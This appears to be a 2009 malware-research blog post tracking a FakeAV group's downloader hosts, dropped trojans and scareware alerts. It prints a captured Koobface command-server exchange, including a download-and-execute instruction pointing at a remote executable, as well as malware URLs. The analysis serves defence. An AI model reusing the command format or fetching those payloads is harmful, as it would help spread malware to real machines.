We posted a couple of weeks ago on the continued success of a group in distributing FakeAv/Rogueware/Scareware.
Please note that their downloaders have been moved to a new home at 65.110.50.141. There are multiple domains currently resolving to that ip managed by “Sago Networks”. One we know of currently serving softwarefortubeview.40019.exe executables is wile-exe.com. The move appears to have happened on June 1st. Avoid executables from that domain for now.
The downloads appear to be committing some sort of click fraud, although they have been known to pop fake alerts to move FakeAv software, see here, here and here.
Update (2009.06.09) — we are following the downloaders, and the group moved to another couple of ip’s yesterday (2009.06.08), this time 66.197.171.9 and 66.197.171.6. For example, you can find the malware at my-exe-profile. com/softwarefortubeview.45084.exe. The server virtually hosts an array of content, include “Download Now!” links that redirect to paid mp3 services, fetish videos, and more malware.
Also related is my-exe-profile. com/ av-scanner.48047.exe. However, this dropper/downloader lays out a couple of Clickfraud trojans, visiting a long list of banner ads and ad sites from the compromised host. A Vundo variant is installed. An unusually packed Koobface variant is dropped on the machine. Another iehelper.dll Bho component pops a screenful of AntiVirus System PRO, or SWP2009Pro, and a dialog “There are serious threats detected on your computer” and another bogus “Windows Security Alert” reporting “Windows reports that your computer is infected”.
The final, and fairly new piece, is that it downloads pdrv.exe from evidek.ro. The “download and exec” command for this executable is sent down from a Koobface related channel, while more bogus alerts are popping on the system:
Partially mangled Koobface post and response are listed here:
POST /ld/gen.php
HTTP/1.0
Host: upr15may.com
f=0&a=1956647682&v=09&c=0&s=ld&l=71140&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1HTTP/1.1
#PID=8000
STARTONCE|hxxp://evidek. ro/1/pdrv.exe
WAIT|120
#BLACKLABEL
EXIT
This dropper creates
%ProgramFiles%\podmena\podmena.dll
%ProgramFiles%\podmena\podmena.sys
for which there is virtually no AV detection at this time. As always, don’t forget your behavioral-based protection.
The podmena.sys driver is interesting — it attaches to the tcpip device driver and appears to intercept network traffic coming and going from the system.
